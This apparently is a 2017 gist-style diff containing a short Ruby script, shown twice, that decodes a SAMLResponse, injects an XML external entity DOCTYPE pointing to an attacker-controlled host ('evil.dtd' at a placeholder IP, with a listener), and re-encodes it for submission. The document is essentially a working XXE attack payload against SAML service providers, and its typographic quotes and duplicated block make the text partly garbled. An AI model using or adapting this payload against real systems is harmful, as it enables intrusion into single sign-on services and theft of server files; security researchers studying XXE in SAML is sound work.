mrbrutti · May 2, 2017 18:54
diff --git a/wr_post_sample_2.rb b/wr_post_sample_2.rb
 def saml_inject(text, ip)
  text.gsub(
    “<?xml version=\”1.0\” encoding=\”UTF-8\”?>”,
    “<?xml version=\”1.0\” encoding=\”UTF-8\”?><!DOCTYPE root [ <!ENTITY % remote SYSTEM \”http://#{ip}/evil.dtd\"> %remote;]>”
  )
 end

 def SAML_recode(a)
  CGI.escape(Base64.encode64(a).strip)
 end

 def SAML_decode(a)
  Base64.decode64(CGI.unescape(a))
 end

 IP=”1.2.3.4:80" # Replace w/ your IP and set a listener
 SAMLResponse = “INSERT_VALID SAMLResponse”
 SAML_recode(saml_inject(SAML_decode(SAMLResponse),IP))
	def saml_inject(text, ip)
	text.gsub(
	“<?xml version=\”1.0\” encoding=\”UTF-8\”?>”,
	“<?xml version=\”1.0\” encoding=\”UTF-8\”?><!DOCTYPE root [ <!ENTITY % remote SYSTEM \”http://#{ip}/evil.dtd\"> %remote;]>”
	)
	end

	def SAML_recode(a)
	CGI.escape(Base64.encode64(a).strip)
	end

	def SAML_decode(a)
	Base64.decode64(CGI.unescape(a))
	end

	IP=”1.2.3.4:80" # Replace w/ your IP and set a listener
	SAMLResponse = “INSERT_VALID SAMLResponse”
	SAML_recode(saml_inject(SAML_decode(SAMLResponse),IP))